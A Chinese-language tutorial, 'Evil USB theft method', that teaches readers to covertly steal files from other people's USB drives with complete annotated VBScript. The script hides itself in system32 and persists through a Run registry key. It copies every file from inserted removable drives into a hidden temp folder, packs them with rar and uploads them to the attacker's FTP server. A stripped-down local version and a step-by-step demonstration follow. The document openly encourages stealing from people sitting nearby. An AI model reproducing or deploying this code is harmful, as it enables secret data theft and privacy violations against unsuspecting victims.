是否很多人在你電腦上插U盤，而你想偷偷竊取他U盤的數(shù)據(jù)？即使他就在你旁邊！或許你想在誰電腦中竊取它的U盤數(shù)據(jù)？這里Unis教你如何秘密地竊取別人U盤中的數(shù)據(jù)，

邪惡的U盤竊取法

。當(dāng)然如果是你自己的電腦就可以直接將對(duì)方的U盤數(shù)據(jù)，比如你想得到對(duì)方U盤中的照片、文本文檔重要信息等等啊統(tǒng)統(tǒng)的竊取到自己電腦里面的某個(gè)隱藏目錄。等對(duì)方拔出了U盤走了之后你就能完完全全看到自己電腦上已經(jīng)悄悄的把他的U盤數(shù)據(jù)偷來了！或如果是別人的電腦，你也想在他電腦中等待他插入U(xiǎn)盤偷偷竊取U盤中的數(shù)據(jù)，然后將數(shù)據(jù)通過后臺(tái)上傳到自己的FTP空間中，自己再回家上網(wǎng)進(jìn)入FTP空間下載對(duì)方U盤的數(shù)據(jù)偷偷查看。這樣都是很容易做到的，當(dāng)然后者的話就必須用到命令行中的rar.exe先將數(shù)據(jù)進(jìn)行壓縮，再將數(shù)據(jù)進(jìn)行FTP命令的上傳。這種偷偷竊取法相信很多人都想做到。比如，小王想得到小李對(duì)方U盤的文件，現(xiàn)只知道小李經(jīng)常會(huì)在小王電腦上插U盤查看文件，但是小李在旁邊，無法竊取對(duì)方的數(shù)據(jù)，那么小王完全可以用今天為大家講解到的U盤數(shù)據(jù)竊取方法現(xiàn)在自己的電腦中運(yùn)行代碼，等待小李插入U(xiǎn)盤的時(shí)候，后臺(tái)將悄悄地將小李U盤的數(shù)據(jù)竊取到電腦的某個(gè)隱藏角落，等待小李拔出U盤走之后，小王就可以偷偷的看小李U盤中的文件了。

    講到這里就要說到今天的代碼了，今天的主要使用的是VBS腳本，其中腳本中多以FSO文件系統(tǒng)對(duì)象這個(gè)組件進(jìn)行竊取的。該代碼主要給大家分兩種，一種適合于本機(jī)，一種適合于他人的機(jī)器。其中腳本運(yùn)行后將會(huì)在后臺(tái)偷偷地運(yùn)行代碼，只有[color=Red]發(fā)現(xiàn)有U盤插入電腦，將會(huì)馬上將對(duì)方U盤的資料拷貝到電腦的某個(gè)隱藏目錄。等待對(duì)方拔掉U盤走人之后，你完全可以找到那個(gè)隱藏目錄偷偷查看對(duì)方U盤中的資料，適合于在自己本機(jī)的代碼主要就是將對(duì)方的U盤文件復(fù)制到自己本機(jī)隱藏目錄中，適合于他人電腦的代碼主要就是能夠先將對(duì)方U盤資料復(fù)制到他電腦的隱藏目錄中，然后將那些文件進(jìn)行一個(gè)打包，上傳到FTP空間，這樣的話，雖然不能使用他電腦看竊取的資料，但是已經(jīng)在后臺(tái)將資料偷偷上傳到了自己的FTP空間中，回家自己上網(wǎng)進(jìn)入FTP空間下載竊取的東西就足夠了。

    講解到這里就開始講解我們的代碼了，下面是代碼的分析，適合于在別人電腦中竊取U盤資料，需要將資料上傳到自己空間的代碼。

    （其中灰色部分是代碼解釋，紅色部分代表的是需要用戶自行修改的）

    on error resume next  //*容錯(cuò)語句，即使下面有錯(cuò)誤也繼續(xù)執(zhí)行

    dim fso,cmd,dir,st,drive   //*定義五個(gè)變量

    set cmd=createobject("wscript.shell")   //*cmd變量復(fù)制建立對(duì)象，調(diào)用wscript.shell組件

    set fso=createobject("scripting.filesystemobject")   //*FSO變量調(diào)用FSO文件系統(tǒng)對(duì)象

    set dir=fso.getspecialfolder(1)   //*dir變量通過FSO對(duì)象模型的getspecialfolder函數(shù)獲取系統(tǒng)目錄system32

    set st=fso.drives   //*將所有磁盤驅(qū)動(dòng)信息賦值為st,此時(shí)st為數(shù)組類型

    if NOT(fso.fileexists(dir&"\rar.exe")) then

    fso.movefile "rar.exe",dir&"\rar.exe"

    end if //*以上三段判斷系統(tǒng)目錄是否存在rar.exe程序，用于命令行壓縮的工具，如果不存在則將我們帶有的rar.exe復(fù)制到dir系統(tǒng)目錄

    if not(fso.fileexists(dir&"ftp.txt")) then   //*判斷當(dāng)前system32目錄下是否有ftp.txt文本文件，該文件是執(zhí)行ftp包括的命令信息。

    set ftpfile=fso.opentextfile(dir&"\ftp.txt",2,true,0)  //*如果不存在就通過FSO的函數(shù)在系統(tǒng)目錄中創(chuàng)建ftp.txt文本。

    ftpfile.write("open IP"&vbcrlf&"username"&vbcrlf&"password"&vbcrlf&"prompt"&vbcrlf&"mput   //*通過fso的對(duì)象寫入執(zhí)行FTP命令用到的信息寫入到ftp.txtc:\windows\temp\upload\*.rar"&vbcrlf&"bye"&vbcrlf) //*并且通過ftp -s命令執(zhí)行ftp.txt中的多個(gè)文件上傳命令，上傳temp\upload中打好壓縮包的文件到空間里。

    ftpfile.close   //*結(jié)束文件上傳執(zhí)行操作

    end if

    if not(fso.fileexists(dir&"\copy.vbs")) then

    fso.getfile(wscript.scriptfullname).move(dir&"\copy.vbs")

    end if   //*將該腳本剪切到系統(tǒng)目錄中，保存為copy.vbs

    fso.createfolder("c:\windows\temp\ufile")  //*通過fso中的函數(shù)在c:\windows\temp中創(chuàng)建ufile文件，用來存放竊取的U盤文件

    fso.createfolder("c:\windows\temp\upload")  //*通過fso中的函數(shù)在c:\windows\temp中創(chuàng)建upload文件，用來存放壓縮過后即將上傳到FTP空間的文件

    cmd.regwrite "HKLM\SoftWare\Microsoft\Windows\currentversion\Run\","c:\windows\system32\copy.vbs","REG_SZ"  //*將該腳本寫入注冊(cè)表的開機(jī)啟動(dòng)中，實(shí)現(xiàn)開機(jī)自動(dòng)運(yùn)行該腳本

    for i=1 to 2

    i=1   //*建立無限循環(huán)，保存程序一直在運(yùn)行

    for each f in st

    if f.drivetype=1 then

    n=f.path   //*用for each in讀取數(shù)組st的驅(qū)動(dòng)盤信息，判斷當(dāng)前移動(dòng)設(shè)備是否為移動(dòng)存儲(chǔ)設(shè)備(drivetype=0是不可識(shí)別的設(shè)，1是移動(dòng)存儲(chǔ)設(shè)備,2是本地磁盤)并將信息賦予變量f，然后將所得到的U盤路徑信息賦予變量n

    fso.copyfile n&"\*","c:\windows\temp\ufile\"  //*通過fso函數(shù)進(jìn)行復(fù)制U盤中的所有文件到C:\Windows\temp\ufile中

    fso.copyfolder n&"\*","c:\windows\temp\ufile"  //*通過fso函數(shù)進(jìn)行復(fù)制U盤中的所有文件夾到C:\Windows\temp\ufile中

    cmd.run "cmd /c rar a -ag -df c:\windows\temp\upload\ c:\windows\temp\ufile",0   //*調(diào)用cmd使用rar.exe將文件打包后復(fù)制到upload目錄

    cmd.run "cmd /c ftp -s:c:\windows\system32\ftp.txt",0  [/color=SlateGray]//*調(diào)用cmd進(jìn)行ftp -s 執(zhí)行ftp.txt中的上傳到空間的命令

    wscript.sleep 900000  [/color=SlateGray]//*啟動(dòng)休眠，為900000毫秒，即15分鐘再執(zhí)行一次全代碼運(yùn)行

    end if

    next

    next

    上面是完全適合于在別人電腦竊取，由于考慮到也到自己的電腦中竊取他人插入的U盤中的數(shù)據(jù)，就需要省去壓縮和上傳到空間中去，因?yàn)樽约旱碾娔X就不怕別人隨便亂動(dòng)了，只要等對(duì)方走了就可以自己在電腦中找到隱藏目錄進(jìn)行查看對(duì)方U盤數(shù)據(jù)了，

電腦資料

《邪惡的U盤竊取法》(http://www.ishadingyu.com)。代碼簡(jiǎn)化后主要如下：

    on error resume next

    dim fso,cmd,dir,st,drive

    set cmd=createobject("wscript.shell")

    set fso=createobject("scripting.filesystemobject")

    set dir=fso.getspecialfolder(1)

    set st=fso.drives

    if not(fso.fileexists(dir&"\copy.vbs")) then

    fso.getfile(wscript.scriptfullname).move(dir&"\copy.vbs")

    end if

    fso.createfolder("c:\windows\temp\ufile")

    cmd.regwrite "HKLM\SoftWare\Microsoft\Windows\currentversion\Run\","c:\windows\system32\copy.vbs","REG_SZ"

    for i=1 to 2

    i=1

    for each f in st

    if f.drivetype=1 then

    n=f.path

    fso.copyfile n&"\*","c:\windows\temp\ufile\"

    fso.copyfolder n&"\*","c:\windows\temp\ufile"

    wscript.sleep 500000

    end if

    next

    next

    下面我們使用第二種代碼作為一個(gè)實(shí)驗(yàn)來講解，實(shí)驗(yàn)主要在虛擬機(jī)中演示，首先已經(jīng)知道我的U盤有大量的數(shù)據(jù)。我們將上面的代碼全部復(fù)制到記事本中，保存后綴名為.vbs的VB腳本，保存后隨意命名，先將該腳本雙擊運(yùn)行，運(yùn)行之后會(huì)發(fā)現(xiàn)該腳本自動(dòng)消失了，其實(shí)不然，該腳本已經(jīng)將自己剪切到了系統(tǒng)目錄中，并且寫入注冊(cè)表的啟動(dòng)項(xiàng)，已確保每次開機(jī)都能運(yùn)行該腳本進(jìn)行數(shù)據(jù)的竊取。 工作原理主要是在雙擊該腳本消失后該腳本會(huì)剪切到C:\Windows\System32下，并且重新命名為copy.vbs，然后在注冊(cè)表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 鍵中的默認(rèn)鍵值中加上，實(shí)現(xiàn)每次開機(jī)啟動(dòng)后運(yùn)行該腳本，腳本將會(huì)在后臺(tái)進(jìn)行工作，一旦發(fā)現(xiàn)有移動(dòng)存儲(chǔ)設(shè)備，例如U盤、移動(dòng)硬盤就會(huì)將數(shù)據(jù)偷偷的復(fù)制到C:\Windows\temp\ufile目錄中，這個(gè)目錄可以說是很隱蔽了。但是用戶卻無法發(fā)現(xiàn)后臺(tái)有程序在拷貝自己U盤的資料，桌面完全是正常的情況，不會(huì)出現(xiàn)任何提示，哈哈！那是否等待對(duì)方走了之后就可以偷偷的在c:\windows\temp\ufile中看到竊取的U盤資料。

    現(xiàn)在的我們已經(jīng)雙擊了該腳本，腳本消失了，我們看看C:\windows\temp目錄下是暫時(shí)沒有ufile目錄的。

    后臺(tái)開始在運(yùn)行腳本，此時(shí)我們打開C:\Windows\temp目錄，此時(shí)就多了一個(gè)Ufile目錄，該目錄中就存在了儲(chǔ)存竊取的數(shù)據(jù)

    打開我們的Ufile中，會(huì)發(fā)現(xiàn)系統(tǒng)正在慢慢地竊取U盤中的文件…….一直都在慢慢地竊取，當(dāng)然竊取等同于復(fù)制U盤中的文件，如果文件過大是需要一定時(shí)間的，也就大概幾分鐘的樣子。

    由于我的U盤中學(xué)習(xí)教程里面的資料太大，有6G多，占滿%90的U盤空間，系統(tǒng)后臺(tái)正在先復(fù)制里面的資料，復(fù)制完畢后將會(huì)偷偷復(fù)制剩下的，代碼是每隔15分鐘完全運(yùn)行一次，也是為了保證某些U盤帶有數(shù)據(jù)燈，因?yàn)榭截愔兴俣热绻�過快就會(huì)狂閃。當(dāng)然如果沒有數(shù)據(jù)燈的話你完全可以設(shè)置時(shí)間為1分鐘甚至更短咯。